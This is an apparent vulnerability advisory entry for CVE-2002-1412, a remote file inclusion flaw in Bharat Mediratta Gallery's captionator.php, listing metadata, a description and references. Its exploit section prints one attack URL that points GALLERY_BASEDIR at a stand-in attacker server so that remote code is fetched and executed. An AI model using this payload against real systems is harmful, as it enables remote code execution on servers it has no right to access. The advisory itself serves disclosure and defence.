Bharat Mediratta Gallery Remote File Inclusion Vulnerability

Vulnerability ID: 1106897
Vulnerability type: Input validation
Published: 2002-08-01
Updated: 2006-08-17
CVE ID: CVE-2002-1412
CNNVD-ID: CNNVD-200304-100
Platform: PHP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/21676
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200304-100
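|Vulnerability details
Bharat Mediratta Gallery is a web-based image gallery system. The captionator.php script in Bharat Mediratta Gallery does not properly check user-supplied parameters, so a remote attacker can exploit this vulnerability to include code hosted on a remote server and execute it. The captionator.php script in Mediratta Gallery does not properly check a variable's value; the problem code is as follows: errors/configmode.php [...] [...] An attacker can submit a request to the captionator.php script that supplies an arbitrary file on a remote host as the value of the 'GALLERY_BASEDIR' parameter. When the 'allow_url_fopen' and 'register_globals' options are enabled in the PHP configuration, the code in the included file is executed on the system with the privileges of the Mediratta Gallery process.
|Exploit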
source: http://www.securityfocus.com/bid/5375/info

Gallery is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Gallery. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'GALLERY_BASEDIR' parameter. 

http://hostname/gallery/captionator.php?GALLERY_BASEDIR=http://your.evil.server.tdl/
|References

Source: DEBIAN
Name: DSA-138
Link: http://www.debian.org/security/2002/dsa-138
Source: BUGTRAQ
Name: 20020801codeinjectioningallery
Link: http://archives.neohapsis.com/archives/bugtraq/2002-07/0471.html
Source: gallery.menalto.com
Link: http://gallery.menalto.com/modules.php?op=modload&name=News&file=article&sid=50&mode=thread&order=0&thold=0
Source: XF
Name: gallery-basedir-execute-commands(9737)
Link: http://xforce.iss.net/xforce/xfdb/9737
Source: BID
Name: 5375
Link: http://www.securityfocus.com/bid/5375